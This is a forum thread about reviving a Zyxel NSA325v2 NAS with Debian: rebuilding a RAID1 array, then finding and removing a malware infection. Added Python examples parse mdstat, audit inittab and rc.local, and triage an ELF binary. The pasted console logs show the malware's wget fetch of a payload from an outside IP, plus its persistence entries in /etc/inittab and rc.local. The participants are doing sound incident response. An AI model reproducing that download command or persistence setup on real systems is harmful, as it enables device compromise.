Re: Zyxel NSA325v2 brick
January 31, 2022 09:30PM
Hi Bodhi,

First of all, I understand the risk of losing the data; although it is important to me, if I can't recover it, I can accept that.

This is what I get after running some commands:

root@debian:~# lsblk
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT
sda 8:0 0 3.6T 0 disk
|-sda1 8:1 0 487M 0 part
`-sda2 8:2 0 3.6T 0 part
sdb 8:16 0 3.6T 0 disk
sdc 8:32 1 7.3G 0 disk
`-sdc1 8:33 1 7.3G 0 part /
mtdblock0 31:0 0 1M 0 disk
mtdblock1 31:1 0 512K 0 disk
mtdblock2 31:2 0 512K 0 disk
mtdblock3 31:3 0 512K 0 disk
mtdblock4 31:4 0 10M 0 disk
mtdblock5 31:5 0 10M 0 disk
mtdblock6 31:6 0 47.8M 0 disk
mtdblock7 31:7 0 10M 0 disk
mtdblock8 31:8 0 47.8M 0 disk

root@debian:/# mdadm --examine --scan
ARRAY /dev/md/0 metadata=1.2 UUID=c99433f8:5348c785:4c59e72c:304e4d42 name=NSA325-v2:0
root@debian:/# cat /proc/mdstat
Personalities : [linear] [raid0] [raid1] [raid10] [raid6] [raid5] [raid4] [multipath]
md0 : inactive sda2[1](S)
3906516992 blocks super 1.2

unused devices: <none>
root@debian:/# mdadm --details /dev/md0
mdadm: unrecognized option '--details'
Usage: mdadm --help
for help
root@debian:/# mdadm --detail /dev/md0
/dev/md0:
Version : 1.2
Raid Level : raid0
Total Devices : 1
Persistence : Superblock is persistent

State : inactive
Working Devices : 1

Name : NSA325-v2:0
UUID : c99433f8:5348c785:4c59e72c:304e4d42
Events : 1184011

Number Major Minor RaidDevice

- 8 2 - /dev/sda2

But the RAID state is "inactive" and I don't know how to make it active so that I can mount it...

--Horacio

Re: Zyxel NSA325v2 brick
January 31, 2022 11:57PM
After struggling a bit, I now have the RAID 1 active and syncing. What I did:

md0 was in an inactive state, so I started it:

root@debian:/# mdadm --run /dev/md0
mdadm: started array /dev/md/0
root@debian:/# mdadm --examine --scan
ARRAY /dev/md/0 metadata=1.2 UUID=c99433f8:5348c785:4c59e72c:304e4d42 name=NSA325-v2:0

root@debian:/# mdadm --detail /dev/md0
/dev/md0:
Version : 1.2
Creation Time : Mon Nov 11 20:52:38 2019
Raid Level : raid1
Array Size : 3906516856 (3725.54 GiB 4000.27 GB)
Used Dev Size : 3906516856 (3725.54 GiB 4000.27 GB)
Raid Devices : 2
Total Devices : 1
Persistence : Superblock is persistent

Update Time : Mon Jan 24 09:48:39 2022
State : clean, degraded
Active Devices : 1
Working Devices : 1
Failed Devices : 0
Spare Devices : 0

Consistency Policy : resync

Name : NSA325-v2:0
UUID : c99433f8:5348c785:4c59e72c:304e4d42
Events : 1184011

Number Major Minor RaidDevice State
- 0 0 0 removed
1 8 2 1 active sync /dev/sda2

root@debian:/# cat /proc/mdstat
Personalities : [linear] [raid0] [raid1] [raid10] [raid6] [raid5] [raid4] [multipath]
md0 : active (auto-read-only) raid1 sda2[1]
3906516856 blocks super 1.2 [2/1] [_U]

unused devices: <none>
root@debian:/#

After that I tried to add the 2nd disk, but as it seems it was not part of the RAID, I copied the partition table from sda; to do that I had to install gdisk:

root@debian:/# apt-get install gdisk

root@debian:/# sgdisk /dev/sda -R /dev/sdb
The operation has completed successfully.
root@debian:/# sgdisk -G /dev/sdb
The operation has completed successfully.
root@debian:/# lsblk
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT
sda 8:0 0 3.6T 0 disk
|-sda1 8:1 0 487M 0 part
`-sda2 8:2 0 3.6T 0 part
`-md0 9:0 0 3.6T 0 raid1
sdb 8:16 0 3.6T 0 disk
|-sdb1 8:17 0 487M 0 part
`-sdb2 8:18 0 3.6T 0 part
sdc 8:32 1 7.3G 0 disk
`-sdc1 8:33 1 7.3G 0 part /
mtdblock0 31:0 0 1M 0 disk
mtdblock1 31:1 0 512K 0 disk
mtdblock2 31:2 0 512K 0 disk
mtdblock3 31:3 0 512K 0 disk
mtdblock4 31:4 0 10M 0 disk
mtdblock5 31:5 0 10M 0 disk
mtdblock6 31:6 0 47.8M 0 disk
mtdblock7 31:7 0 10M 0 disk
mtdblock8 31:8 0 47.8M 0 disk
root@debian:/# mdadm --add /dev/md0 /dev/sdb2
mdadm: added /dev/sdb2
root@debian:/# cat /proc/mdstat
Personalities : [linear] [raid0] [raid1] [raid10] [raid6] [raid5] [raid4] [multipath]
md0 : active raid1 sdb2[2] sda2[1]
3906516856 blocks super 1.2 [2/1] [_U]
[>....................] recovery = 0.1% (5997632/3906516856) finish=356.7min speed=182197K/sec

unused devices: <none>
root@debian:/#

And using watch you can monitor the status:

root@debian:/# watch cat /proc/mdstat
Every 2.0s: cat /proc/mdstat debian: Tue Feb 1 00:49:17 2022

Personalities : [linear] [raid0] [raid1] [raid10] [raid6] [raid5] [raid4] [multipath]
md0 : active raid1 sdb2[2] sda2[1]
3906516856 blocks super 1.2 [2/1] [_U]
[=====>...............] recovery = 26.4% (1033634176/3906516856) finish=266.4min speed=179688K/sec

unused devices: <none>

The last step, after the sync is complete, is to figure out how to mount it...

--Horacio
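As an added example, not code from the thread, here is a parser for the three /proc/mdstat snapshots shown above (inactive, degraded auto-read-only, and rebuilding) that reports whether an array still needs `mdadm --run`, is running degraded, or is mid-recovery. The snapshots are copied from the post with whitespace normalised; the verdict names are this example's own.

```python
"""Parse /proc/mdstat snapshots and classify each md array's health.

The three snapshots below are copied from the thread (constructed copies,
whitespace normalised): spare-only inactive, degraded auto-read-only, rebuilding.
"""
import re

MDSTAT_INACTIVE = """\
Personalities : [linear] [raid0] [raid1] [raid10] [raid6] [raid5] [raid4] [multipath]
md0 : inactive sda2[1](S)
      3906516992 blocks super 1.2

unused devices: <none>
"""

MDSTAT_DEGRADED = """\
Personalities : [linear] [raid0] [raid1] [raid10] [raid6] [raid5] [raid4] [multipath]
md0 : active (auto-read-only) raid1 sda2[1]
      3906516856 blocks super 1.2 [2/1] [_U]

unused devices: <none>
"""

MDSTAT_RECOVERING = """\
Personalities : [linear] [raid0] [raid1] [raid10] [raid6] [raid5] [raid4] [multipath]
md0 : active raid1 sdb2[2] sda2[1]
      3906516856 blocks super 1.2 [2/1] [_U]
      [>....................]  recovery =  0.1% (5997632/3906516856) finish=356.7min speed=182197K/sec

unused devices: <none>
"""

# "md0 : active (auto-read-only) raid1 sdb2[2] sda2[1]"  (the level is absent for inactive arrays)
ARRAY_RE = re.compile(r"^(md\d+) : (\w+)(?: \((.*?)\))? ((?:raid\d+|linear|multipath)\s+)?(.*)$")
# "sda2[1](S)" -> device, slot, flag list such as (S)pare or (F)aulty
MEMBER_RE = re.compile(r"(\S+?)\[(\d+)\]((?:\([A-Z]\))*)")
# "[2/1] [_U]" -> disks expected, disks present, per-slot map ('_' = missing)
COUNTS_RE = re.compile(r"\[(\d+)/(\d+)\] \[([U_]+)\]")
# "recovery = 26.4% (...) finish=266.4min speed=..."
PROGRESS_RE = re.compile(r"(resync|recovery|reshape|check) =\s*([\d.]+)%.*?finish=([\d.]+)min")


def parse_mdstat(text):
    """Return {array_name: info} for every md device in an mdstat snapshot."""
    arrays, current = {}, None
    for line in text.splitlines():
        m = ARRAY_RE.match(line)
        if m:
            name, state, qualifier, level, members = m.groups()
            current = arrays[name] = {
                "state": state, "qualifier": qualifier or "", "level": (level or "").strip(),
                "members": [{"dev": d, "slot": int(s), "spare": "(S)" in f, "faulty": "(F)" in f}
                            for d, s, f in MEMBER_RE.findall(members)],
                "expected": None, "present": None, "slot_map": None, "progress": None,
            }
            continue
        if current is None:
            continue
        if not line.strip():          # a blank line ends the array's block
            current = None
            continue
        c = COUNTS_RE.search(line)
        if c:
            current["expected"], current["present"] = int(c.group(1)), int(c.group(2))
            current["slot_map"] = c.group(3)
        p = PROGRESS_RE.search(line)
        if p:
            current["progress"] = {"op": p.group(1), "percent": float(p.group(2)),
                                   "finish_min": float(p.group(3))}
    return arrays


def assess(info):
    """One-word verdict for a parsed array."""
    if info["state"] != "active":
        return "inactive"      # needs `mdadm --run` / --assemble before it can be mounted
    if info["progress"] is not None:
        return "recovering"    # a member is being rebuilt; redundancy is not back yet
    if info["expected"] is not None and info["present"] < info["expected"]:
        return "degraded"      # running on fewer disks than the superblock expects
    return "healthy"


def report(text):
    """Return [(array, verdict, detail)] for a whole snapshot."""
    out = []
    for name, info in parse_mdstat(text).items():
        detail = ""
        if info["slot_map"]:
            missing = [i for i, ch in enumerate(info["slot_map"]) if ch == "_"]
            detail = f"missing slot(s) {missing}"
        if info["progress"]:
            detail += f", {info['progress']['op']} {info['progress']['percent']}% done"
        if info["members"] and all(m["spare"] for m in info["members"]):
            detail = "every member is marked (S)pare; the array was never started"
        out.append((name, assess(info), detail))
    return out


if __name__ == "__main__":
    for snap in (MDSTAT_INACTIVE, MDSTAT_DEGRADED, MDSTAT_RECOVERING):
        print(report(snap))
```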
Re: Zyxel NSA325v2 brick
February 01, 2022 11:14AM
Hi Bodhi,
Sometimes I surprise myself with the stupid questions I ask... my apologies for that...
Finally I was able to mount the RAID on Debian, and I have all my info there!!
I'm really happy to play now with a serious Linux. During this process I learned a lot; I really want to thank you, Bodhi.
My last question is whether it is possible to connect to the box using X11, I mean whether it can have a kind of graphical environment. I was reading some posts explaining how to install GNOME, but to be sure, it is better to ask the experts...
--Horacio
Re: Zyxel NSA325v2 brick
February 01, 2022 12:03PM
GNOME is a bit heavy for a 512MiB 500MHz ARMv5, I think.

But if you are running an X server on your client, you can run graphical programs on your NAS, having their in/output on your X server. All you have to do is install xauth (and your graphical program):
apt install xauth x11-apps

Now you can login to your box using
ssh -X user@nsa325
and execute for instance xeyes in your shell.
Re: Zyxel NSA325v2 brick
February 01, 2022 12:09PM
Thanks Mijzelf,
You know, before the "crash" my box had ffp installed (thanks to fonz for introducing me to this world), but now with Debian it seems to be more productive and powerful.
--Horacio
Re: Zyxel NSA325v2 brick
February 01, 2022 01:26PM
Hello there,

I'm getting this on the serial console:

sh: 10: /var/run/tty5: Permission denied
--2022-02-01 13:53:46-- http://202.110.187.205/f/tty6
Connecting to 202.110.187.205:80... connected.
INIT: cannot execute "/tmp/loopd0"se...
INIT: cannot execute "/tmp/loopd0"
INIT: cannot execute "/tmp/loopd0"
INIT: cannot execute "/tmp/loopd0"
INIT: cannot execute "/tmp/loopd0"
INIT: cannot execute "/tmp/loopd0"
INIT: cannot execute "/tmp/loopd0"
INIT: cannot execute "/tmp/loopd0"
INIT: cannot execute "/tmp/loopd0"
INIT: cannot execute "/tmp/loopd0"
INIT: Id "0" respawning too fast: disabled for 5 minutes
200 OK
Length: 43261 (42K) [text/plain]
Saving to: '/var/run/tty6'

/var/run/tty6 100%[===================>] 42.25K 31.1KB/s in 1.4s

2022-02-01 13:53:48 (31.1 KB/s) - '/var/run/tty6' saved [43261/43261]

sh: 11: /var/run/tty6: Permission denied
INIT: cannot execute "/tmp/loopd0"
INIT: cannot execute "/tmp/loopd0"
INIT: cannot execute "/tmp/loopd0"
INIT: cannot execute "/tmp/loopd0"
INIT: cannot execute "/tmp/loopd0"
INIT: cannot execute "/tmp/loopd0"
INIT: cannot execute "/tmp/loopd0"
INIT: cannot execute "/tmp/loopd0"
INIT: cannot execute "/tmp/loopd0"
INIT: cannot execute "/tmp/loopd0"
INIT: Id "0" respawning too fast: disabled for 5 minutes
INIT: cannot execute "/tmp/loopd0"
INIT: cannot execute "/tmp/loopd0"
INIT: cannot execute "/tmp/loopd0"
INIT: cannot execute "/tmp/loopd0"
INIT: cannot execute "/tmp/loopd0"
INIT: cannot execute "/tmp/loopd0"
INIT: cannot execute "/tmp/loopd0"
INIT: cannot execute "/tmp/loopd0"
INIT: cannot execute "/tmp/loopd0"
INIT: cannot execute "/tmp/loopd0"
INIT: Id "0" respawning too fast: disabled for 5 minutes

Even though everything seems to be working fine... what could be the problem?

-Horacio
Re: Zyxel NSA325v2 brick
February 01, 2022 02:39PM
What is in /var/run/tty6?
And what is in /etc/inittab?
Re: Zyxel NSA325v2 brick
February 01, 2022 02:43PM
tty6 is an executable:

root@debian:~# ls -la /var/run/tty6
-rwx------ 1 root root 43261 Jan 3 23:28 /var/run/tty6
root@debian:~#

And /etc/inittab:

root@debian:~# cat /etc/inittab
# /etc/inittab: init(8) configuration.
# $Id: inittab,v 1.91 2002/01/25 13:35:21 miquels Exp $

# The default runlevel.
id:2:initdefault:

# Boot-time system configuration/initialization script.
# This is run first except when booting in emergency (-b) mode.
si::sysinit:/etc/init.d/rcS

# What to do in single-user mode.
~~:S:wait:/sbin/sulogin

# /etc/init.d executes the S and K scripts upon change
# of runlevel.
#
# Runlevel 0 is halt.
# Runlevel 1 is single-user.
# Runlevels 2-5 are multi-user.
# Runlevel 6 is reboot.

l0:0:wait:/etc/init.d/rc 0
l1:1:wait:/etc/init.d/rc 1
l2:2:wait:/etc/init.d/rc 2
l3:3:wait:/etc/init.d/rc 3
l4:4:wait:/etc/init.d/rc 4
l5:5:wait:/etc/init.d/rc 5
l6:6:wait:/etc/init.d/rc 6
# Normally not reached, but fallthrough in case of emergency.
z6:6:respawn:/sbin/sulogin

# What to do when CTRL-ALT-DEL is pressed.
ca:12345:ctrlaltdel:/sbin/shutdown -t1 -a -r now

# Action on special keypress (ALT-UpArrow).
#kb::kbrequest:/bin/echo "Keyboard Request--edit /etc/inittab to let this work."

# What to do when the power fails/returns.
pf::powerwait:/etc/init.d/powerfail start
pn::powerfailnow:/etc/init.d/powerfail now
po::powerokwait:/etc/init.d/powerfail stop

# /sbin/getty invocations for the runlevels.
#
# The "id" field MUST be the same as the last
# characters of the device (after "tty").
#
# Format:
# <id>:<runlevels>:<action>:<process>
#
# Note that on most Debian systems tty7 is used by the X Window System,
# so if you want to add more getty's go ahead but skip tty7 if you run X.
#
#1:2345:respawn:/sbin/getty 38400 tty1
#2:23:respawn:/sbin/getty 38400 tty2
#3:23:respawn:/sbin/getty 38400 tty3
#4:23:respawn:/sbin/getty 38400 tty4
#5:23:respawn:/sbin/getty 38400 tty5
#6:23:respawn:/sbin/getty 38400 tty6

# Example how to put a getty on a serial line (for a terminal)
#
#T0:23:respawn:/sbin/getty -L ttyS0 9600 vt100
#T1:23:respawn:/sbin/getty -L ttyS1 9600 vt100

# Example how to put a getty on a modem line.
#
#T3:23:respawn:/sbin/mgetty -x0 -s 57600 ttyS3

T0:2345:respawn:/sbin/getty -L ttyS0 115200 linux
0:2345:respawn:/tmp/loopd0
Re: Zyxel NSA325v2 brick
February 01, 2022 11:23PM
Horacio,

> I´m getting this on serial console:
> sh: 10: /var/run/tty5: Permission denied

Out of the box, this rootfs should not have this error. Did you install packages like Mijzelf mentioned above, and the error showed up after that?

https://forum.doozan.com/read.php?3,130039,130449#msg-130449

-bodhi
===========================
Forum Wiki
bodhi's corner (buy bodhi a beer)
Re: Zyxel NSA325v2 brick
February 02, 2022 12:46PM
> 0:2345:respawn:/tmp/loopd0

This certainly doesn't belong there. And *something* downloads /var/run/tty6 from 202.110.187.205. A Google search on /tmp/loopd0 gave me this:
> /tmp/loopd0 was identified as malicious by YARA according to rules: 000 Common Rules

Did you execute anything from your raid array after you had mounted it? And what exactly happened to your stock OS?

/Edit: Have you forwarded the ssh port in your router to your NAS? With the default root:root login?



Re: Zyxel NSA325v2 brick
February 02, 2022 01:43PM
Hi Bodhi / Mijzelf,
I removed the xauth and x11-apps packages. Yes, I have forwarded port 22 on my router, but I changed the root password.
I tried to look at the messages through netconsole, but it seems there is nothing there; since these messages were collected from the serial port, I have to connect it to my laptop again and see if the messages still appear.

I remember that I tried to do a wget to Google, but it didn't work... and I just mounted the RAID, that's all.
I will post the serial console messages here later...
Thanks

Horacio
Re: Zyxel NSA325v2 brick
February 02, 2022 04:38PM
Horacio,

Netconsole is not active during the time after the kernel has booted and the rootfs starts running. The only way we can see the activities is with the serial console.

I would suggest stopping the forwarding for a while, and monitoring the serial console log and syslog to see if anything is trying to call home. What's in the RAID array is unknown; it could be Zyxel calling home when you accidentally run some binaries on the RAID file system.

If the purpose is to recover data files, then after you've done that, just wipe it clean.

-bodhi
Re: Zyxel NSA325v2 brick
February 02, 2022 05:14PM
Hi Bodhi,
After I removed the packages, now it seems to be much better; check the attached log. It's disconnected from the network.
At the end of the boot process I got this, but it's not repeating anymore:

Starting NTP server: ntpd.
Starting SMB/CIFS daemon: smbd.
Starting OpenBSD Secure Shell server: sshd.
Running local boot scripts (/etc/rc.local)
.
INIT: cannot execute "/tmp/loopd0"
INIT: cannot execute "/tmp/loopd0"
INIT: cannot execute "/tmp/loopd0"
INIT: cannot execute "/tmp/loopd0"
INIT: cannot execute "/tmp/loopd0"
INIT: cannot execute "/tmp/loopd0"
INIT: cannot execute "/tmp/loopd0"
INIT: cannot execute "/tmp/loopd0"
INIT: cannot execute "/tmp/loopd0"
INIT: cannot execute "/tmp/loopd0"
INIT: Id "0" respawning too fast: disabled for 5 minutes

Debian GNU/Linux 11 debian ttyS0

debian login:
Attachments: bootlog.log (32.4 KB)
Re: Zyxel NSA325v2 brick
February 02, 2022 05:17PM
At the end of /etc/rc.local, it has this line:

exit 0
"/root/loopd0"

I think that is not correct...
Re: Zyxel NSA325v2 brick
February 02, 2022 05:44PM
> At the end of /etc/rc.local, it has this line:
>
> exit 0
> "/root/loopd0"
>
> I think that is not correct...

Yes, remove it. That must be an artifact of something running and messing with /etc/rc.local.

Or extract the original rootfs Debian-5.13.6-kirkwood-tld-1-rootfs-bodhi.tar.bz2 and copy /etc/rc.local over.

-bodhi
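A small audit script for the two persistence points this thread turned up: the `0:2345:respawn:/tmp/loopd0` entry in /etc/inittab and the line placed after `exit 0` in /etc/rc.local. This is an added example, not code from the thread; the sample files are constructed abbreviations of what was posted, and the list of "untrusted" directories is this example's own assumption.

```python
"""Audit the two sysvinit persistence points this thread turned up:
/etc/inittab respawn entries and code placed after `exit 0` in /etc/rc.local.

The sample files are constructed abbreviations of what was posted.
"""
import re

# Assumption of this example: a boot-time entry that executes from one of these
# user- or temp-writable locations never ships with a stock Debian rootfs.
UNTRUSTED_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/", "/var/run/", "/run/",
                  "/var/lock/", "/root/", "/home/")

SAMPLE_INITTAB = """\
# /etc/inittab: init(8) configuration.
id:2:initdefault:
si::sysinit:/etc/init.d/rcS
~~:S:wait:/sbin/sulogin
l2:2:wait:/etc/init.d/rc 2
#6:23:respawn:/sbin/getty 38400 tty6
T0:2345:respawn:/sbin/getty -L ttyS0 115200 linux
0:2345:respawn:/tmp/loopd0
"""

SAMPLE_RC_LOCAL = """\
#!/bin/sh -e
# rc.local - executed at the end of each multiuser runlevel.
exit 0
"/root/loopd0"
"""


def parse_inittab(text):
    """Yield (id, runlevels, action, process) for each active (uncommented) entry."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(":", 3)
        if len(parts) == 4:
            yield tuple(parts)


def audit_inittab(text):
    """Return [(entry_id, reason)] for entries a reviewer should look at."""
    findings = []
    for ident, _runlevels, action, process in parse_inittab(text):
        words = process.strip().strip('"').split()
        exe = words[0] if words else ""
        if any(exe.startswith(d) for d in UNTRUSTED_DIRS):
            findings.append((ident, f"{action} entry runs {exe} from a writable scratch location"))
        elif action == "respawn" and not any(k in exe for k in ("getty", "sulogin")):
            findings.append((ident, f"respawn entry for a non-getty program: {exe}"))
    return findings


def audit_rc_local(text):
    """Return [(line_no, line, reason)] for rc.local lines that should not be there."""
    findings, after_exit = [], False
    for no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if after_exit:
            # The shell has already exited by the time it gets here, so this line is
            # dead code; its presence means something appended to the file.
            findings.append((no, line, "text after 'exit 0': dead code, file was edited"))
            continue
        if re.match(r"^exit(\s+\d+)?\s*$", line):
            after_exit = True
            continue
        if any(d in line for d in UNTRUSTED_DIRS):
            findings.append((no, line, "boot-time command referencing a writable scratch location"))
    return findings


if __name__ == "__main__":
    for hit in audit_inittab(SAMPLE_INITTAB) + audit_rc_local(SAMPLE_RC_LOCAL):
        print(hit)
```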
Re: Zyxel NSA325v2 brick
February 02, 2022 05:47PM
Horacio,

I think recreating the rootfs on USB, and then reassembling the array again, would be a good thing to do.

-bodhi
Re: Zyxel NSA325v2 brick
February 02, 2022 05:59PM
Hi Bodhi,
To recreate the rootfs I don't need to flash the box again, right?
Just follow the post
Linux Kernel 5.15.5 Kirkwood package and Debian rootfs on "26 Sep 2021", correct? Also, I can use the box as it is now in order to format a new USB, and once it's done, just replace it.
Please correct me if I'm wrong.
-Horacio
Re: Zyxel NSA325v2 brick
February 02, 2022 09:04PM
ehorher Wrote:
-------------------------------------------------------
> Hi Bodhi,
> To recreate the rootfs I don't need to flash the
> box again, right?
> Just follow the post
> Linux Kernel 5.15.5 Kirkwood package and Debian
> rootfs on "26 Sep 2021", correct?

Correct!

> Also, I can use
> the box as it is now in order to format a new USB, and
> once it's done, just replace it.
> Please correct me if I'm wrong.

Yes, but things going on are a bit too suspicious. I would use a different computer to format the USB rootfs. And plug it in; it should boot right away.

-bodhi
Re: Zyxel NSA325v2 brick
February 02, 2022 10:29PM
Hi Bodhi,
Now it seems to be OK. No more INIT messages on the console.
Attached is the log file for the boot process.
I had to remount the RAID and install some packages.
Last question: how can I disable netconsole? It seems that it is not really useful and it puts a delay on the boot process looking for the server IP address.
--Horacio
Attachments: NewBoot.log (40.3 KB)
Re: Zyxel NSA325v2 brick
February 03, 2022 01:17AM
Horacio,

> Now it seems to be OK. No more INIT messages on the
> console.
> Attached is the log file for the boot process.
> I had to remount the RAID and install some
> packages.

Looks good!

> Last question: how can I disable netconsole? It seems
> that it is not really useful and it puts a delay on the
> boot process looking for the server IP address.

Right, since you have serial console, there is no need for netconsole.

Check the preboot env:

fw_printenv preboot
The output should be
preboot=run preboot_nc

So remove it:
fw_setenv preboot

-bodhi
Re: Zyxel NSA325v2 brick
February 03, 2022 09:07AM
Done!
Thanks Bodhi.
Re: Zyxel NSA325v2 brick
February 03, 2022 12:10PM
@ehorher: Do you by chance have a copy of /var/run/tty6? The download link is dead, and I'm curious what is inside.
Re: Zyxel NSA325v2 brick
February 03, 2022 01:48PM
Hey Mijzelf,
It is a binary file. But you know, I realized where the issue was, regarding the suspicious IP mentioned before.
Before the crash, my box was running ffp from a USB stick. Then after I installed Debian (using another USB), I plugged this one into the front USB port.
Then the box started with this weird behavior, connecting to this IP and downloading a file... I realized it because when Bodhi told me to reinstall Debian, I was going to use this USB, and when I unplugged it, that stopped. Only the INIT messages remained, which were fixed after a new rootfs.
--Horacio
Re: Zyxel NSA325v2 brick
March 03, 2022 06:44PM
Hello Bodhi and all forum followers.

I'm a newbie at this and I'm reaching out for help to try to recycle my NSA325v1 (2 HDDs inserted).
I've read several threads in this forum and I'm able to use the serial connection and kwboot from my Lubuntu laptop.

However, it seems I hit a problem while following the instructions from
2017.07 U-Boot Kirkwood - GoFlexNet, GoFlexHome, PogoE02, Dockstar, iConnect, NetgearStora, PogoV4/Mobile, Sheevaplug, NSA325, NSA320, NSA310S, NSA320S, NSA310, HP T5325, Dreamplug

At step 4 I found that the NSA325v1 has bad blocks:
dmesg | grep -i 'bad'
Scanning device for bad blocks
Bad eraseblock 34 at 0x000000440000
Bad eraseblock 120 at 0x000000f00000
block 15 is bad

I think I'm good to go ahead with the procedure, right?...

Still, before going ahead, I tested the "Try booting with UART" procedure, using the respective NSA325 u-boot image (from 2017.07 U-Boot Kirkwood).

However, the NSA325 is not booting with the expected 2017.07-tld-1 version after the reboot (as requested)...
kwboot -t -B 115200 /dev/ttyUSB0 -b uboot.2017.07-tld-1.nsa325.mtd0.kwb -p
Sending boot message. Please reboot the target...\
Sending boot image...
(kwboot progress output and the Marvell ASCII-art banner, garbled in the paste, omitted)
 ** MARVELL BOARD: DB-88F6282A-BP LE 

U-Boot 1.1.4 (Oct 17 2012 - 15:22:14) Marvell version: 3.5.9

U-Boot code: 00600000 -> 0067FFF0  BSS: -> 006CFB00

There's an unexpected error at the end, though (please check alubuntu.txt in the attachment):
Verifying Checksum ... +xmodem: Protocol error

So this doesn't seem to change the kernel...
Where did I miss the procedure? Or what could be wrong?

Looking forward to your assistance.
Attachments: aputty.txt (54.2 KB), alubuntu.txt (3 KB)
Re: Zyxel NSA325v2 brick
March 03, 2022 09:09PM
Hi jminasl,

> at step 4 I found that the NSA325v1 has bad
> blocks:
>
> dmesg | grep -i 'bad'
> Scanning device for bad blocks
> Bad eraseblock 34 at 0x000000440000
> Bad eraseblock 120 at 0x000000f00000
> block 15 is bad
>
>
> I think I'm good to go ahead with the procedure,
> right?...

Yes. You're good to go. The bad blocks are way out in other parts of NAND. u-boot resides in mtd0, which is the 1st MB (block 0-7).

But kwboot is quite important to get it working first.

> Verifying Checksum ... +xmodem: Protocol error

When you see xmodem Protocol error, it is most likely the noise on the serial wires.

On the Lubuntu laptop terminal, just recall the kwboot command (up arrow), and then execute it again. Repeat this as many times as you can; eventually it will handshake with the NSA325.

Also, make sure that the serial wires are away from a power source. The magnetic interference could introduce noise and break the handshake sequence. Some wires are shielded but most are not.

-bodhi
Re: Zyxel NSA325v2 brick
March 04, 2022 10:31AM
Hi Mijzelf,
I found a copy of tty6 file on my laptop.
Please check it.
//Horacio
Attachments: tty6 (42.2 KB)
Re: Zyxel NSA325v2 brick
March 05, 2022 12:08PM
Ah, thanks. The file has 'obfuscation' written all over it. It has an invalid ELF header:
$ file tty6
tty6: ELF 32-bit LSB executable, ARM, EABI4 version 1 (GNU/Linux), too many section (65535)
It has very high entropy; it can hardly be compressed. So whatever it is, it's not pure executable code. My first guess was that it is mainly compressed code, and decompresses itself in memory. But it contains 2 recognizable strings:
PROT_EXEC|PROT_WRITE failed.
keikaku doori!
The first one might have something to do with mmap, the second one is Japanese, and means 'Just as planned'. So maybe the executable mmaps itself to decompress the payload, and spawns an error when that fails, and says 'keikaku doori!' when it succeeds.
But I was not able to disassemble the file, so far. objdump fails because of the invalid ELF header. Actually I think the file is not executable at all, as the kernel won't be able to load it either. But I haven't dared to try it yet. There might be a feature in the kernel...
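An added example (not from the thread) that checks the same two things `file` and the failed compression hinted at: an ELF32 header whose section count sits in the reserved range with no section table behind it, and a near-incompressible body. The sample binary is constructed inside the code (the real tty6 is not reproduced); the anomaly wording and the 7.2 bits/byte threshold are this example's own assumptions.

```python
"""Sanity-check an ELF32 header and measure payload entropy.

Mirrors the two observations in the thread: `file` reports "too many
section (65535)" and the binary is almost incompressible.  The sample
binary below is constructed here, not the real tty6.
"""
import hashlib
import math
import struct
from collections import Counter

ELF32_HDR = struct.Struct("<HHIIIIIHHHHHH")   # the 36 bytes after the 16-byte e_ident
EM_ARM, ET_EXEC, SHN_LORESERVE = 40, 2, 0xFF00


def build_sample(body_len=4096):
    """Constructed ARM ELF32: e_shnum=65535, e_shoff=0, pseudo-random body."""
    e_ident = b"\x7fELF" + bytes([1, 1, 1, 3, 0]) + b"\x00" * 7   # 32-bit, LSB, GNU/Linux ABI
    hdr = ELF32_HDR.pack(ET_EXEC, EM_ARM, 1, 0x8000, 52, 0, 0x04000000,   # EABI v4 in e_flags
                         52, 32, 2, 40, 0xFFFF, 0xFFFF)
    # A SHA-256 chain stands in for packed/encrypted code: high entropy, deterministic.
    chunks, seed = [], b"constructed-sample"
    while sum(map(len, chunks)) < body_len:
        seed = hashlib.sha256(seed).digest()
        chunks.append(seed)
    return e_ident + hdr + b"".join(chunks)[:body_len]


def parse_elf32_header(data):
    """Return the ELF32 header fields as a dict; ValueError if this is not ELF32."""
    if len(data) < 52 or data[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    if data[4] != 1:
        raise ValueError("not ELF32")
    names = ("e_type e_machine e_version e_entry e_phoff e_shoff e_flags "
             "e_ehsize e_phentsize e_phnum e_shentsize e_shnum e_shstrndx").split()
    hdr = dict(zip(names, ELF32_HDR.unpack_from(data, 16)))
    hdr["ei_data"], hdr["ei_osabi"] = data[5], data[7]
    return hdr


def header_anomalies(hdr, file_size):
    """List header inconsistencies that break objdump/readelf but not execve.

    The kernel loader only consults the program headers, so a binary can run
    with a garbage section table; that is exactly why packers corrupt it.
    """
    issues = []
    if hdr["e_shnum"] >= SHN_LORESERVE:
        issues.append(f"e_shnum={hdr['e_shnum']} is in the reserved range (>= 0xFF00)")
    if hdr["e_shnum"] and hdr["e_shoff"] == 0:
        issues.append("sections claimed but e_shoff=0: no section header table exists")
    elif hdr["e_shoff"] + hdr["e_shnum"] * hdr["e_shentsize"] > file_size:
        issues.append("section header table extends past end of file")
    if hdr["e_shstrndx"] and hdr["e_shstrndx"] >= hdr["e_shnum"]:
        issues.append("e_shstrndx points outside the section table")
    if hdr["e_ehsize"] != 52 or hdr["e_phentsize"] != 32:
        issues.append("e_ehsize/e_phentsize do not match the ELF32 layout")
    if hdr["e_phnum"] == 0:
        issues.append("no program headers: the kernel could not map this at all")
    return issues


def shannon_entropy(data):
    """Bits per byte: ~8.0 means packed/encrypted; plain ARM code is usually well below 7."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def triage(data, packed_threshold=7.2):
    """Combine the header check and body entropy into one verdict dict."""
    hdr = parse_elf32_header(data)
    body = data[52:]
    anomalies = header_anomalies(hdr, len(data))
    ent = shannon_entropy(body)
    return {
        "machine": "ARM" if hdr["e_machine"] == EM_ARM else hex(hdr["e_machine"]),
        "anomalies": anomalies,
        "entropy": round(ent, 2),
        "likely_packed": bool(anomalies) and ent > packed_threshold,
    }


if __name__ == "__main__":
    print(triage(build_sample()))
```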
Re: Zyxel NSA325v2 brick
March 08, 2022 01:08PM
I tried it (on an immutable system), and believe me, it is executable. So far I have found that it forks itself with an executable stack, as reported by syslog:
